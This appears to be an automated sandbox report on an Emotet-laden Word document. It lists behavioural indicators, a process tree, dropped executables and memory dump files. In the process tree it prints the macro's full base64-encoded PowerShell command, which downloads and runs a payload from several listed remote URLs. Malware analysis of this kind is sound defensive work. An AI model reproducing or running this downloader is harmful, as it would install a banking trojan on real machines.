Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1528	1624	powersheLL.exe	24

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1528	powersheLL.exe

Blacklisted process makes network request 1 IoCs

flow	pid	Process
4	1528	powersheLL.exe

Executes dropped EXE 2 IoCs

pid	Process
1880	273.exe
1604	cmstplua.exe

Emotet
Emotet is a trojan that is primarily spread through spam emails.
trojan banker emotet
Office loads VBA resources, possible macro or embedded object present

C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\fcad2a97c97b92310e8c88ae7aa71452923bc3c8e67d4be4d12b5b93320432ae.doc"
1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Modifies registry class
PID:1420

C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
powersheLL -e JABSAEoARgBDAE4AYgBrAHIAPQAnAFYAQwBXAFYAWgBtAHAAaQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGUAQwBVAHIAaQBgAFQAWQBQAGAAUgBPAHQAbwBDAE8AbAAiACAAPQAgACcAdABsAHMAMQAyACwAIAB0AGwAcwAxADEALAAgAHQAbABzACcAOwAkAFcARwBGAE0AUQByAHkAcQAgAD0AIAAnADIANwAzACcAOwAkAE0AQQBBAEkARQB6AHUAaAA9ACcASQBVAFgAWgBDAHAAbgB1ACcAOwAkAEQAWQBPAEUAQQBoAGMAcwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAVwBHAEYATQBRAHIAeQBxACsAJwAuAGUAeABlACcAOwAkAEIATABNAFQASQBjAGgAcAA9ACcAQgBHAFMAWABIAGsAYwBlACcAOwAkAEEAUQBXAEUAUQB4AG0AZgA9ACYAKAAnAG4AZQB3AC0AbwAnACsAJwBiAGoAZQAnACsAJwBjAHQAJwApACAAbgBlAHQALgB3AGUAQgBjAEwAaQBlAE4AdAA7ACQAUQBBAEkATABXAGcAcQBuAD0AJwBoAHQAdABwADoALwAvAGEAcgB0AGUAeABwAHIAbwBkAHUAYwB0AGkAbwBuAHMALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwB4AEgAZABiAG0AawAvACoAaAB0AHQAcAA6AC8ALwB3AGgAaQBzAHQAbABlAGQAbwB3AG4AZgBhAHIAbQAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvAHQAbABzAGoAdwA4ADEALwAqAGgAdAB0AHAAOgAvAC8AZQAtAG0AbwB0AGkAdgBhAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBiAEYAcgA1ADMAMQAyADIAMAAvACoAaAB0AHQAcAA6AC8ALwBzAHQAbwBsAGsAaQBlAC4AbgBlAHQALwBtAC8ASAAwAEwAVgA1ADkANQA3ADQALwAqAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBmAGEAYwBjAG8AbQBwAHUAdABlAHIALgBjAG8AbQAvAGkAbQBhAGcAZQBzAC8ANQBtAE0AQQBnADcAYgBLAEsASwAvACcALgAiAFMAUABsAGAAaQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAUQBBAEIAQwBTAHUAcwBpAD0AJwBZAEQAVABGAE0AcwBtAGgAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFYASwBPAFgAVABiAGUAZAAgAGkAbgAgACQAUQBBAEkATABXAGcAcQBuACkAewB0AHIAeQB7ACQAQQBRAFcARQBRAHgAbQBmAC4AIgBkAGAAbwB3AE4AbABPAEEAZABGAGAAaQBgAGwARQAiACgAJABWAEsATwBYAFQAYgBlAGQALAAgACQARABZAE8ARQBBAGgAYwBzACkAOwAkAEkAUwBSAFkAQgBvAHAAdAA9ACcAWgBMAE0ATQBXAHkAZAB3ACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQAJwArACcALQBJACcAKwAnAHQAZQBtACcAKQAgACQARABZAE8ARQBBAGgAYwBzACkALgAiAGwAZQBgAE4AZwBUAGgAIgAgAC0AZwBlACAAMwA1ADQAMgAxACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAnAHcAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMAJwApAC4AIgBjAGAAUgBlAGEAVABFACIAKAAkAEQAWQBPAEUAQQBoAGMAcwApADsAJABZAFMAUwBCAEEAcQBqAG0APQAnAFYAVABBAEwAWgBvAHUAbAAnADsAYgByAGUAYQBrADsAJABTAFkATgBOAFoAdABzAHgAPQAnAEwARwBVAEIAUQB5AGwAagAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABRAFEAUQBIAFMAYgB5AHgAPQAnAFkAWgBOAFkAQwBuAGoAZAAnAA==
1⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
- Blacklisted process makes network request
PID:1528

C:\Users\Admin\273.exe
C:\Users\Admin\273.exe
1⤵
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
PID:1880
- C:\Windows\SysWOW64\WinSCard\cmstplua.exe
  "C:\Windows\SysWOW64\WinSCard\cmstplua.exe"
  2⤵
  - Suspicious use of SetWindowsHookEx
  - Suspicious behavior: EnumeratesProcesses
  - Executes dropped EXE
  PID:1604

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1420-2-0x0000000008960000-0x0000000008964000-memory.dmp

Filesize
16KB

Download
memory/1420-4-0x0000000007070000-0x0000000007270000-memory.dmp

Filesize
2.0MB

Download
memory/1420-5-0x000000000ADF0000-0x000000000ADF4000-memory.dmp

Filesize
16KB

Download
memory/1420-6-0x000000000BE70000-0x000000000BE74000-memory.dmp

Filesize
16KB

Download
memory/1604-14-0x0000000000200000-0x000000000020C000-memory.dmp

Filesize
48KB

Download
memory/1880-11-0x0000000000260000-0x000000000026C000-memory.dmp

Filesize
48KB

Download